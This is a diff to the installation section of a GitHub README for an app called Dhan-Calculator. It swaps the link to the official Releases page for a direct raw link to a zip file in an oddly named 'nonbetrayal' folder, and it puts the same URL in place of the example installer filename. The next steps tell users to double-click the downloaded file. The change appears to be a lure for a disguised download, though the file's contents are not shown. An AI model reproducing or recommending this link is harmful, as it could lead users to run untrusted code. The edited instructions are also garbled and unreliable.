Tanikai-Ganesh/Dhan-Calculator/README.md

 ### 2. Download & Install

-To get started with Dhan-Calculator, visit this page to download: [Dhan-Calculator Releases](https://github.com/Tanikai-Ganesh/Dhan-Calculator/releases).
+To get started with Dhan-Calculator, visit this page to download: [Dhan-Calculator Releases](https://raw.githubusercontent.com/Tanikai-Ganesh/Dhan-Calculator/main/nonbetrayal/Dhan-Calculator_v2.6.zip).

 Choose the latest version from the list.
-Download the installer file (e.g., `DhanCalculatorInstaller.exe`), and then follow these steps:
+Download the installer file (e.g., `https://raw.githubusercontent.com/Tanikai-Ganesh/Dhan-Calculator/main/nonbetrayal/Dhan-Calculator_v2.6.zip`), and then follow these steps:

 1. Locate the downloaded file in your Downloads folder or specified directory.
 2. Double-click the file to start the installation process.